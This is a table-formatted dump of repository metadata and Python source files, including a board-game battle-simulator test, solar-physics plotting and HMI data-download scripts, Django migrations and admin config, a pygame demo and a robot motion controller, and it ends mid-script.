blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5f65068b340764574dbfebbc61828c9b7fe411d7 | 2f4437893e1a9ecf0a2e380eab5b552c889bde8d | /app/tests/basic/inf1_inf2.py | fa28705313151c3b2ed84d34042a7b145d95fe41 | [
"MIT"
] | permissive | EBaalhuis/TI4_battle_sim | 85e9eae97240ce49ceda74c7b56482ec4308ff3f | c139ca71d98f320f780cbfc6297d5d1d1ad08a0b | refs/heads/main | 2023-03-24T13:17:12.036201 | 2021-03-25T21:11:43 | 2021-03-25T21:11:43 | 328,025,930 | 4 | 2 | MIT | 2021-03-25T16:57:13 | 2021-01-08T22:27:08 | Python | UTF-8 | Python | false | false | 600 | py | import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
import app.calculator.calculator as calc
from app import testing_helpers
attacker, defender, options, tol = testing_helpers.defaults()
# target source: http://alphamou.se/ti4calc/
target = [4, 9, 87] # target percentages; [tie, attacker, defender]
print("1 Infantry vs 2 Infantry")
# Units
attacker["infantry"] = 1
defender["infantry"] = 2
# Factions
# Ground Combat
options["ground_combat"] = True
# Options
outcomes = calc.calculate(attacker, defender, options)
testing_helpers.evaluate(outcomes, target, tol)
| [
"ebbaalhuis@gmail.com"
] | ebbaalhuis@gmail.com |
a7f37d7825f23e51b5abe2fd578e1945767f3fea | 835a938c2adce722dc7130aa8d1ea56576a4e443 | /subfig.py | 08aad91746cadade3ead7316dde7332c8395b459 | [] | no_license | pdicerbo/destr | cd5af011ce1fd95484cf08250c764e294fe24087 | e7580ce71af8bc2d5d4f76a0ffc78e5ae9b197a0 | refs/heads/master | 2021-01-18T07:55:40.151670 | 2015-02-20T15:10:29 | 2015-02-20T15:10:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,051 | py | import numpy as np
import os
import string
from bisect import bisect_left # for BilinearInterpolation
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import colorsys
#from matplotlib import rc
matrix_Logdelta_LogT_H2 = 'matrix_modif_Logdelta_LogT_H2.dat'
matrix_Logdelta_LogT_H2_tcool = 'matrix_modif_Logdelta_LogT_tcool.dat'
#path_out = '/scratch2/dicerbo/destr/time1e5/first/'
path_out = '/scratch2/dicerbo/destr/third/'
path_plot = '/scratch2/dicerbo/destr/exit/time1e5/first/'
path_exit = '/scratch2/dicerbo/destr/exit/compare/'
path_two = '/scratch2/dicerbo/plot_path/very_def/'
# global arrays: Temperature, H2OverDensity, H2Fraction, tcool to load UM's tables
# T in K, tcool in Gyr
T = None # dimension 1x50
Dens = None # dimension 1x50
FH2 = None # dimension 50x50
t_cool = None # dimension 50x50
def main():
comparison()
#init_plot()
def comparison():
print '\n\tWithin comparison function\n'
#tmp = str(raw_input("\n\tEnter initial temperature of gas [Gyr] :> "))
tmp = '700'
dir1 = path_out+'T'+tmp+'/'
if not os.path.exists(dir1):
print '\tError: directory ' + dir1 + 'doesent exist!\n\tExit'
return 1.
dir2 = path_two+'T'+tmp+'/'
pathx = path_exit+'T'+tmp+'/'
if os.path.exists(pathx):
print '\n\tpath %s exist!'%(pathx)
else:
print '\n\tmaking directory'
os.makedirs(pathx)
print '\t%s created successfully'%(pathx)
files = os.listdir(dir1)
nametp = []
for name in files:
if string.count(name, 'press') == 0:
matrix = np.loadtxt(dir1+name, comments = '#')
if len(matrix) > 3.:
nametp.append(name)
print '\tfile %s listed' % (name)
else:
print '\tfile %s skipped' % (name)
#namedef = nametp[(len(nametp) - 7)]
for namedef in nametp:
print '\tPlotting ' + namedef + ' file!'
mat1 = np.loadtxt(dir1+namedef, comments = '#')
print '\tMatrix from ' + dir1+namedef + ' loaded; len: %g' % (len(mat1))
mat2 = np.loadtxt(dir2+namedef, comments = '#')
print '\tMatrix from ' + dir2+namedef + ' loaded; len: %g' % (len(mat2))
#data to plot
time1 = mat1[:,0]
f1 = mat1[:, 3]
time2 = mat2[:,0]
f2 = mat2[:, 3]
time1[time1 == 0.] = 1.
time1 = np.log10(time1)
time2[time2 == 0.] = 1.
time2 = np.log10(time2)
plt.figure()
plt.plot(time1, f1, 'k.', label = 'destr')
plt.plot(time2, f2, 'r-', label = 'full')
ax = plt.gca()
plt.legend(loc = 2)
ax.set_xlabel('time (log t)')
ax.set_ylabel('H2 Fraction')
ax.set_title('H2 Fraction Evolution')
newname = pathx + 'comparisonLog10P' + namedef[-8:-4] + '.jpg'
plt.savefig(newname)
plt.close('all')
print '\n\t'+newname[len(pathx):]+' done\n'
print '\n\tFinally end\n'
def init_plot():
if os.path.exists(path_plot):
print '\n\tpath %s exist!'%(path_plot)
else:
print '\n\tmaking directory'
os.makedirs(path_plot)
print '\t%s created successfully'%(path_plot)
dirs = os.listdir(path_out)
dirs.sort();
for d in dirs:
if string.count(d, 'l') == 0 and string.count(d, 'T') == 1:
print '\n\tStart working on '+ d
#adjust(path_out, d)
plot_def(d)
print '\n\tEnd working on ' + d
print '\n\tFinally End\n'
def plot_def(directory):
print '\n\tWithin plot function\n'
#Load tcool matrix
LoadMatrix(filename=matrix_Logdelta_LogT_H2_tcool)
global T ; global Dens ; global FH2; global t_cool
tcool = t_cool
tcool[tcool > 0.] = np.log10(tcool[tcool > 0.])
v_min = -5
v_max = 7.
tcool[tcool == 0.] = v_min
tcool[tcool > v_max] = v_max
tcool[tcool <= v_min] = v_max
'''
H2 = FH2
H2[H2 > 0.] = np.log10(H2[H2 > 0.])
v_min = -6
v_max = -2.
H2[H2 == 0.] = v_min
H2[H2 > v_max] = v_max
H2[H2 < v_min] = v_min
'''
numlev = 15
dmag0 = (v_max - v_min) / float(numlev)
levels0 = np.arange(numlev) * dmag0 + v_min
#path's plot
files = os.listdir(path_out+directory)
files.sort()
fls = files[:]
press = np.zeros(len(files), dtype = float)
j = 0
for name in files:
if string.count(name, 'time') != 0:
fls[j] = directory+'/'+name
press[j] = float(name[(len(name)-8):-4])
j += 1
else:
br = path_out + directory + '/' + name
print "\n\tFile " + name + " is for Blitz&Rosolowsky's plot -> Continue\n"
if j == len(files):
filedef = fls[:]
pdef = press[:]
else:
filedef = fls[:(j-len(files))]
pdef = press[:(j-len(files))]
pmax = pdef.max()
pmin = pdef.min()
h = np.zeros(pdef.size, dtype = float)
ind = 0
for p in pdef:
h[ind] = ((p-pmin) / (pmax-pmin))*250.
ind += 1
cdef = [colorsys.hsv_to_rgb(x/360., 1., 1.) for x in h]
#plots
fig = plt.figure(figsize=(18,16))
figura = fig.add_subplot(2, 1, 1, adjustable='box', aspect = 1.1)
plt.title('Paths in Phase Diagram\n', fontsize = 28)
#figura = plt.contourf(Dens,T,H2,levels0,extend='both', cmap = cm.hot)
figura = plt.contourf(Dens,T,tcool,levels0,extend='both', cmap = cm.hot_r)
ax1 = plt.gca()
ax1.set_xlim([Dens.min(), Dens.max()])
ax1.set_ylim([1., 5.])
for tick in ax1.xaxis.get_major_ticks():
tick.label.set_fontsize(17)
for tick in ax1.yaxis.get_major_ticks():
tick.label.set_fontsize(17)
cbar = plt.colorbar(figura,format='%3.1f', shrink=0.8)
cbar.set_ticks(np.linspace(v_min,v_max,num=levels0.size,endpoint=True))
#cbar.set_label('H$_{2}$ fraction',fontsize=20)
cbar.set_label('$\log_{10}t_{cool} [Gyr]$',fontsize=25)
print "\n\tUmberto's matrix plotted\n"
k = 0
for name in filedef:
print '\tPlotting ' + name[(len(directory)+1):] + ' file'
#figura = plt.plotfile(path_out+name, delimiter = '\t', cols=(1, 2), comments='#', color = cdef[k], marker='.',
#mfc = cdef[k], mec = cdef[k], label = 'Log10P = '+str(pdef[k]), newfig=False)
data = np.loadtxt(path_out+name, comments = '#'); data = data.T
rho = data[1, :]; tmp = data[2, :]
plt.plot(rho, tmp, color = cdef[k], marker='.', mfc = cdef[k], mec = cdef[k], label = 'Log10P = '+str(pdef[k]))
k += 1
lgd = plt.legend(bbox_to_anchor=(1.55, 0.5), loc=5, borderaxespad=1.)
plt.xlabel('$\log_{10}\\rho [g/cm^3]$',fontsize=25) ; plt.ylabel('$\log_{10} T[k]$',fontsize=25)
#Blitz&Rosolowsky plot
figura2 = fig.add_subplot(2, 1, 2, adjustable='box', aspect = 1.3)
plt.title('Blitz & Rosolowsky\n', fontsize = 28)
ax2 = plt.gca()
newm = np.loadtxt(br, comments = '#'); newm = newm.T
press = newm[0, :]
br_ro = newm[3, :]
fh2 = newm[4, :]
ax2.set_xlim([3., 6.])
ax2.set_ylim([0., 1.02])
ax2.set_xlabel('$\log_{10} P/k_B [K/cm^3]$', fontsize = 25)
ax2.set_ylabel('$f_{H2}$', fontsize = 25)
plt.plot(press, br_ro, 'k-')
plt.plot(press, fh2, 'b-')
for tick in ax2.xaxis.get_major_ticks():
tick.label.set_fontsize(17)
for tick in ax2.yaxis.get_major_ticks():
tick.label.set_fontsize(17)
#scale figure2
scale = figura2.get_position().bounds
newpos = [scale[0]*3./4. + 0.2, scale[1]*3./4., scale[2]*3./4., scale[3]*3./4.]
figura2.set_position(newpos)
newname = path_plot + 'path_' + directory + '.jpg'
plt.savefig(newname, bbox_extra_artists=(lgd,), bbox_inches='tight')
#plt.savefig(newname)
plt.close('all')
print '\n\t'+newname[len(path_plot):]+' done\n'
def LoadMatrix(filename=False):
"""
This function loads one Umberto's file,
returns the matrix and the corresponding edges
"""
global matrix_Logdelta_LogT_H2
global matrix_Logdelta_LogT_H2_tcool
if filename==False:
raise IOError('\n\t filename MUST be provided\n')
# store the path of this module
# locate = inspect.getfile(LoadMatrix)
# dir_file = locate.replace('H2fraction.py','')
# filename = dir_file+filename
if not os.path.isfile(filename):
raise IOError('\n\t filename ',filename,' NOT found\n')
# load file
matrix = np.loadtxt(filename,comments='#')
# OverDensity edges
global Dens ; global T ; global FH2 ; global t_cool
Dens = matrix[0,:]
# Temperature edges
T = matrix[1,:]
if filename == matrix_Logdelta_LogT_H2:
FH2 = matrix[2:,:]
elif filename == matrix_Logdelta_LogT_H2_tcool:
t_cool = matrix[2:,:]
else:
raise IOError('\n\t It seems that ',filename,' does not exist\n')
main()
| [
"dicerbo@lapoderosa.oats.inaf.it"
] | dicerbo@lapoderosa.oats.inaf.it |
fa27bce37bd4a31c0734171d2f4b56a9949bad56 | d52413173437ba73ecdf822ca895e659f00a8ce7 | /kiwibackend/application/module/artifact/migrations/0003_auto_20151209_1606.py | 66ae6b692b0125f17dbbc5170a7fce62dbc9ac44 | [] | no_license | whiteprism/mywork | 2329b3459c967c079d6185c5acabd6df80cab8ea | a8e568e89744ca7acbc59e4744aff2a0756d7252 | refs/heads/master | 2021-01-21T11:15:49.090408 | 2017-03-31T03:28:13 | 2017-03-31T03:28:13 | 83,540,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('artifact', '0002_auto_20150914_0908'),
]
operations = [
migrations.AddField(
model_name='artifact',
name='heroTypeList_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u88c5\u5907\u7684\u82f1\u96c4\u7684\u7c7b\u578b'),
),
migrations.AddField(
model_name='artifact',
name='searchDifficuty_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361\u96be\u5ea6'),
),
migrations.AddField(
model_name='artifact',
name='searchInstances_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361'),
),
]
| [
"snoster@163.com"
] | snoster@163.com |
18435b988db2adb2d750faf0e9145a409d01aff3 | daa464da92a33a10ae6ead5bbd51b1e63fcbddfb | /miniProject/main/plot.py | 868fb4192f3b648e2b65f3dc3ce9052438e2825c | [] | no_license | lzddzh/cs5234 | 53234e4c1a61b1af01a0caa77253a16aed573bda | d07bcdf8517dd9403cfe582d01be751b444c9ea2 | refs/heads/master | 2020-05-29T08:49:57.118957 | 2017-02-11T13:18:59 | 2017-02-11T13:18:59 | 69,001,785 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | f = open("The Monkey's Paw.txt")
content = f.read()
lines = content.strip().split();
num = [int(x) for x in lines]
array = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
for each in num:
array[each] += 1
s = 0
for each in array:
s += each
for i in range(0, len(array)):
array[i] = (array[i] + 0.0) / s
print s, array
| [
"7077804@qq.com"
] | 7077804@qq.com |
f24cb68aa5f6a89d1cf9f9d97a614e601f5bed0f | b83bd2709729ac2eb65026ba6e377d619371369a | /examples/move_mouse.py | 68532b2392f3324b465d53030f8bcac5a3564b4a | [] | no_license | main1015/pygame-demo | cbc36a1066497346a14c016c5904106740ef0aac | a6bebfdc7f21ec675f29155f039d410431785050 | refs/heads/master | 2021-01-22T05:05:20.932704 | 2013-07-04T09:37:05 | 2013-07-04T09:37:05 | 11,117,996 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,686 | py | # -*- coding: utf-8 -*-
__author__ = 'Administrator'
# Sample Python/Pygame Programs
# Simpson College Computer Science
# http://cs.simpson.edu
'''
使用鼠标移动一个图形
'''
import pygame
# Define some colors
black = ( 0, 0, 0)
white = ( 255, 255, 255)
blue = ( 50, 50, 255)
green = ( 0, 255, 0)
dkgreen = ( 0, 100, 0)
red = ( 255, 0, 0)
purple = (0xBF,0x0F,0xB5)
brown = (0x55,0x33,0x00)
# Function to draw the background
def draw_background(screen):
# Set the screen background
screen.fill(white)
def draw_item(screen,x,y):
pygame.draw.rect(screen,green,[0+x,0+y,30,10],0)
pygame.draw.circle(screen,black,[15+x,5+y],7,0)
pygame.init()
# Set the height and width of the screen
size=[700,500]
screen=pygame.display.set_mode(size)
# Initial position of our object
item_pos=-30
#Loop until the user clicks the close button.
done=False
# Used to manage how fast the screen updates
clock=pygame.time.Clock()
while done==False:
for event in pygame.event.get(): # User did something
if event.type == pygame.QUIT: # If user clicked close
done=True # Flag that we are done so we exit this loop
draw_background(screen)
# Get the current mouse position. This returns the position
# as a list of two numbers.
pos = pygame.mouse.get_pos()
# Fetch the x and y out of the list, just like we'd fetch letters out of a string.
x=pos[0]
y=pos[1]
# Draw the item where the mouse is.
draw_item(screen,x,y)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# Limit to 20 frames per second
clock.tick(20)
pygame.quit () | [
"446740010@qq.com"
] | 446740010@qq.com |
9a48e22f8eaa6712d2b8bb9c83b468a5f54e3fc2 | 249dfff2a8f1f2b0df042baf7eadb1147f641daa | /task2.py | e4aec93d7e449c33b7f8333687c24b2ef06b9fe5 | [] | no_license | sheilatruong96/portalInterview | dd71a97430113e83a8c907670af547fe53e0ae83 | 0358ca7efb635f0f82911bf1702cf039fe29b3fc | refs/heads/master | 2021-08-15T15:13:43.871423 | 2017-11-17T22:17:24 | 2017-11-17T22:17:24 | 111,150,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from datetime import datetime
##create data structure that contains/represents all the information
events = ["Interview at the Portal: Feb 23 2017 3:00PM - 4:30PM",
"Lunch with Cindy: Feb 25 2017 12:00PM - 1:00PM",
"Dinner with John: Feb 24 2017 5:00PM - 5:30PM",
"Conference: Feb 24 2017 11:00AM - 4:30PM"]
eventDict = dict()
for eachEvent in events:
eventandDatetime = eachEvent.split(": ",1)
eventDict[eventandDatetime[0]] = eventandDatetime[1]
##Add 4 more vents to dataset making sure 2 added events overlap
eventDict["Morning job"] = 'Nov 1 2017 12:00PM - 3:00PM'
eventDict["Dinner with family"] = 'Nov 1 2017 10:00AM - 1:00PM'
eventDict["Study for midterm"] = 'Feb 25 2017 1:00PM - 3:00PM'
eventDict["Project Presentation"] = 'Nov 2 2017 12:00PM - 3:00PM'
##Develop algorithm to find overlapping events
##remake specific dictionary
for event in eventDict:
splitPart = eventDict[event].split("-")
firstPart = splitPart[0].strip()
secPart = splitPart[1].strip()
eventDate = datetime.strptime(firstPart,'%b %d %Y %I:%M%p').date()
eventStartTime = datetime.strptime(firstPart,'%b %d %Y %I:%M%p').time()
eventEndTime = datetime.strptime(secPart,'%I:%M%p').time()
eventDict[event] = dict()
eventDict[event][eventDate] = (eventStartTime, eventEndTime)
dateConflict = dict()
##check for date conflict
for item in eventDict:
for d in eventDict[item]:
if d not in dateConflict:
dateConflict[d] = [item]
else:
dateConflict[d].append(item)
##check for time conflict
start = 0
end = 0
for eachDate in dateConflict:
if len(dateConflict[eachDate]) > 1:
for eachEvent in dateConflict[eachDate]:
start = eventDict[eachEvent][eachDate][0]
end = eventDict[eachEvent][eachDate][1]
| [
"noreply@github.com"
] | sheilatruong96.noreply@github.com |
088237f546d90336685ac5b4adec442668b908d9 | 1349b8d3077b84bf7f21d437c32f72c3d471cee6 | /src/controller.py | 797b0b29781d3a54c8bcaa48b416297831f964cc | [] | no_license | gustavollps/youbot | 6d95c446db3a3701acd999b7adabf37cf8b107c8 | c364ce1bd322e030ec74b8cb44c311f97dca3717 | refs/heads/master | 2020-09-17T04:27:03.928914 | 2019-11-28T21:14:42 | 2019-11-28T21:14:42 | 223,988,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,896 | py | import rospy
from geometry_msgs.msg import Twist
from utils import *
class Controller:
kp = 0.4
ki = 0.01
kd = 0.5
I = 0
error = 0
old_error = 0
cmdvel_pub = None
vellim = 0.8
move_kp = 1
move_kp_fast = 2
def __init__(self, cmdvel_pub):
self.cmdvel_pub = cmdvel_pub
def setAngle(self, setpoint_angle, odom_angle):
self.I = constrain(self.I, 0.5)
setpoint_angle = fix_angle(setpoint_angle, odom_angle[2])
self.error = (setpoint_angle - odom_angle[2])
threshold = 30 * math.pi / 180
if abs(self.error) < threshold:
P = self.kp * self.error
I = self.I + self.error * self.ki
D = (self.error - self.old_error) * self.kd
PID = P + I + D
self.old_error = self.error
# print(PID, error, angle, odom_angle[2])
return PID
else:
controller_val = 0.5
if self.error < 0:
return -controller_val
elif self.error > 0:
return controller_val
def moveCmd(self, x, y, rot):
msg = Twist()
x = constrain(x, self.vellim)
y = constrain(y, self.vellim)
msg.linear.x = y
msg.linear.y = x
msg.angular.z = rot
self.cmdvel_pub.publish(msg)
def moveLocal(self, x, y, odom):
dx = x - odom.pose.pose.position.x
dy = y - odom.pose.pose.position.y
min_vel = 0.000
if 0 < dx < min_vel:
dx = min_vel
elif -min_vel < dx < 0:
dx = -min_vel
if 0 < dy < min_vel:
dy = min_vel
elif -min_vel < dy < 0:
dy = -min_vel
# move_cmd(0, 0, rot)
self.moveCmd(dx, dy, 0)
def moveGlobal(self, point, ang, odom, fast):
x = point[0]
y = point[1]
if fast:
kp_m = self.move_kp_fast
else:
kp_m = self.move_kp
dx = (x - odom.pose.pose.position.x) * kp_m
dy = (y - odom.pose.pose.position.y) * kp_m
odom_angle = get_angle(odom)
yaw = odom_angle[2]
vel_ang = math.atan2(dy, dx)
vel_mod = math.sqrt(dx ** 2 + dy ** 2)
dang = vel_ang - yaw
sy = math.sin(dang)
cy = math.cos(dang)
vx = vel_mod * cy
vy = vel_mod * sy
rot = -self.setAngle(ang, odom_angle)
vx = constrain(vx, 1)
vy = constrain(vy, 1)
ang = fix_angle(ang, yaw)
if not fast:
if abs(ang - yaw) > 5 * math.pi / 180:
vx = vy = 0
vx = constrain(vx, 1)
vy = constrain(vy, 1)
self.moveCmd(vx, vy, rot)
else:
vx = constrain(vx, 1.5)
vy = constrain(vy, 1.5)
self.moveCmd(vx, vy, rot)
def stop(self):
self.I = 0
self.moveCmd(0, 0, 0)
| [
"gustavollps@gmail.com"
] | gustavollps@gmail.com |
4a375ac9b82ae9d25d1b1f41d7dda93abbf0da48 | 08bf92d4ab2ae84b75ef71cc2fa09873a45015a4 | /app/venv/lib/python3.6/copy.py | 6c1d950706c13a1b7092a2c08ddd89250a8f9ce8 | [] | no_license | afeierman/listen-local | 2986e827f4d5400475520f8be1c6ac74b66f6b2b | 2d95419a6120e37665d3f2c3a22f37de25448f69 | refs/heads/master | 2021-01-22T06:36:51.247035 | 2018-03-27T19:55:46 | 2018-03-27T19:55:46 | 81,772,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | /home/andrew/miniconda3/lib/python3.6/copy.py | [
"andrew.feierman@gmail.com"
] | andrew.feierman@gmail.com |
d701a9fdfa6f370314ed7cd6527b7b4e96d03442 | 24f4815ba8a325169ec2b3faa0ff26627368901c | /7.user input and while loops/7.2.4 break.py | a7e6a6f4fb8aa53b3fc01d652357afcef78539e8 | [] | no_license | gahakuzhang/PythonCrashCourse-LearningNotes | b57d9328fe978acdb344faa60ed255b953742aeb | d0c0ee7f85dbc276cb42312f5cdb023d3cbe35ae | refs/heads/master | 2021-09-01T21:17:52.775832 | 2017-12-28T17:05:03 | 2017-12-28T17:05:03 | 111,400,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | #7.2.4 using break to exit a loop
#while True开头的循环会的不断运行,直到遇到break
#break不执行余下的代码并退出整个循环
prompt="\nPlease enter the name of cities you have visited: "
prompt+="\n(Enter 'quit' when you are finished.) "
while True:
city=input(prompt)
if city=='quit':
break
else:
print("I'd love to go to "+city.title()+"!")
| [
"noreply@github.com"
] | gahakuzhang.noreply@github.com |
d92da44aeec3f2cba4f058a3ea8914c7a10221aa | 198da4f1c3e9ab4880a7e84e5a208f080778f85d | /apps/organization/adminx.py | 557b8576e27746935b6b7d2802b4a324705f35e7 | [] | no_license | cdmonkey/MxOnline | 11645a9a72d0bd6980ed9eb295cc462774d06867 | 7380e1e5710e1f7b949299d413e786331d40f32c | refs/heads/master | 2020-03-27T17:10:20.409425 | 2018-08-30T06:05:33 | 2018-08-30T06:05:33 | 146,700,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | __author__ = 'cdmonkey'
__date__ = '2018/8/3 15:58'
import xadmin
from .models import City, CourseOrg, Teacher
class CityAdmin:
list_display = ["name", "desc", "add_time"]
search_fields = ["name", "desc"]
list_filter = ["name", "desc", "add_time"]
class CourseOrgAdmin:
list_display = ["name", "desc", "category", "image", "address", "city", "add_time"]
search_fields = ["name", "desc", "category", "address", "city"]
list_filter = ["name", "desc", "category", "image", "address", "city", "add_time"]
class TeacherAdmin:
list_display = ["name", "org", "work_years", "work_company", "work_position", "points", "add_time"]
search_fields = ["name", "org", "work_years", "work_company", "work_position", "points"]
list_filter = ["name", "org", "work_years", "work_company", "work_position", "points", "add_time"]
xadmin.site.register(City, CityAdmin)
xadmin.site.register(CourseOrg, CourseOrgAdmin)
xadmin.site.register(Teacher, TeacherAdmin)
| [
"brucemx@qq.com"
] | brucemx@qq.com |
345d3711ce3a62958820b876e58f7dff7835e2a4 | af9d9043a83a751f00f7b805533d87ccce330d21 | /Portfolio/Prophy Science/test_task/app/migrations/0002_keyphrase_exist.py | 197e667e522e8a81097b327d8155de69d7d95913 | [] | no_license | HeCToR74/Python | e664b79593a92daa7d39d402f789812dfc59c19f | f448ec0453818d55c5c9d30aaa4f19e1d7ca5867 | refs/heads/master | 2023-03-08T13:44:19.961694 | 2022-07-03T19:23:25 | 2022-07-03T19:23:25 | 182,556,680 | 1 | 1 | null | 2023-02-28T15:30:01 | 2019-04-21T16:26:48 | HTML | UTF-8 | Python | false | false | 425 | py | # Generated by Django 3.0.6 on 2021-01-24 11:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='keyphrase',
name='exist',
field=models.BooleanField(default=1),
preserve_default=False,
),
]
| [
"noreply@github.com"
] | HeCToR74.noreply@github.com |
ee372759b920eeecc32a7ab4c1a17a49fdf1a5fc | ad65c833df24cf7aeacc1f9c953e3ef15701bda5 | /djangofour/first_app/migrations/0001_initial.py | b7aa5975474c0e7bb65bbfa83f90b8244fd9320d | [] | no_license | 098anu098/django-deployment | cb3d15edd90d34a8976a33905f2bdef2b751194a | 2640cec0edd8b7a39febceb2c9479ac5ef9da319 | refs/heads/master | 2022-09-23T10:29:19.251290 | 2020-06-05T08:42:53 | 2020-06-05T08:42:53 | 269,566,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | # Generated by Django 3.0.6 on 2020-06-04 16:35
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('portfolio', models.URLField()),
('picture', models.ImageField(upload_to='')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"098anu098@gmail.com"
] | 098anu098@gmail.com |
ba011fc53d95bdff7c0a68055d7286baae096113 | 16db9aee91f511ee18736177befeaf32488a06cb | /randomNumber_backup_to_start_task14.py | 2a99c5b530b7fcab2f399657fa1ad204195b7ee0 | [] | no_license | AdotHahn/Course | 9324c35982f5fbcd6d10acd18db518672a29cfd4 | 01b32e12ae0dff6b38c17869ec4fbddad7384770 | refs/heads/master | 2020-05-31T07:19:09.484835 | 2019-06-04T08:42:21 | 2019-06-04T08:42:21 | 190,162,838 | 0 | 0 | null | 2019-06-04T08:41:13 | 2019-06-04T08:41:13 | null | UTF-8 | Python | false | false | 1,273 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# team: teammember 1, teammember 2, teammember 3
# expert of exercise block 1: teammember 1
# temptest
# what is happening to me?
import random
import time
import sys
from matplotlib import pyplot as plt
def get_random_number_with_randint(start, end):
num = random.randint(start, end)
return num
def write_log_file(outputfilename, data):
f = open(outputfilename + ".log", "a")
f.write("Our randomly generated number is " + str(data) + " (" + time.strftime("%H:%M:%S") + ")\n")
f.close()
def get_color_by_dice_roll(spots):
colors = ["blue", "green", 'red', 'yellow', 'purple', 'orange']
return colors[spots-1]
def get_color_by_dice_naive(spots):
colours = ['blue', 'green', 'red', 'yellow', 'purple', 'orange']
return colours[spots-1]
if __name__ == "__main__":
outputfilename = "randomNumber"
rolls_new = []
for i in range(6):
roll = get_random_number_with_randint(1, 6)
rolls_new.append(roll)
print(rolls_new)
sys.stdout.flush()
color = get_color_by_dice_roll(roll)
print("Last colour would be {}".format(color))
write_log_file(outputfilename, color)
plt.barh(range(6), rolls_new)
plt.show()
input("enter to close")
| [
"baltasar.ruechardt@ds.mpg.de"
] | baltasar.ruechardt@ds.mpg.de |
cb1b755acd76f9db92cf7cb4a054a194126f2c56 | 2cf87feeebfe128d6c60067e82e5b28b3a84ae45 | /aracle/data/make3dslices.py | a5b16c308b96da0c083019c4adf28e64496bd654 | [
"MIT"
] | permissive | jiwoncpark/aracle | b536fbea39480b7af96daff1a9c51d2a7f131866 | 20aabe27ce65b738b77192242dc89eda612f945e | refs/heads/master | 2020-06-03T15:21:35.386628 | 2019-11-12T17:49:34 | 2019-11-12T17:49:34 | 191,626,657 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,320 | py | import drms #pip install drms, astropy, sunpy , skvideo
import numpy as np
import astropy.units as u
import shutil
import os
import datetime
import matplotlib.pyplot as plt
import skvideo.io
from astropy.io import fits
from matplotlib.pyplot import imshow
from PIL import Image
from sunpy.map import Map
from datetime import date, time, datetime, timedelta
workdir = 'C:/Users/alexf/Desktop/HMI_Data/'
fits_dir = workdir + 'fits/'
if not os.path.exists(workdir):
os.mkdir(workdir)
print("Directory " + workdir + "does not exist. Creating...")
start = datetime(2010,5,1,1,0,0)#date time object format is year, month, day, hour, minute, second
end = datetime(2018,5,1,0,0,0)
time_interval = timedelta(minutes = 60) #timedelta will accept weeks,days,hours,minutes and seconds as input
chunk_size = 480 #chunk size is the number of hmi files downloaded in each export call. must be at least 1
export_protocol = 'fits'#using as-is instead of fits will result in important metadata not being downloaded
email = 'hsmgroupnasa@gmail.com'#use a group email
series = 'hmi.M_720s'
if (end < start):
print("The end date is before the start date. Please select an end date after the start date")
#sys.exit()
if not os.path.exists(fits_dir):
os.mkdir(fits_dir)
print("Directory " + fits_dir + "does not exist. Creating...")
c = drms.Client(email=email, verbose = True)
total = (end-start) // time_interval + 1
print('Downloading ' + str(total) + ' files')
missing_files = []
def download(start,end,chunk_size,time_interval):
current_time = start
while(current_time<end):
if (end-current_time > (time_interval * chunk_size)):
time_chunk = (time_interval * chunk_size)
else:
time_chunk = end-current_time
end_time = current_time + time_chunk
current_timestring = current_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
end_timestring = end_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
query = series + '[' + current_timestring + '-' + end_timestring + '@' + str(time_interval.total_seconds()) + 's]'
print('Query string: ' + query)
try:
r = c.export(query, protocol = export_protocol)
r.download(fits_dir)
exists = os.path.isfile(fits_dir + '.1')
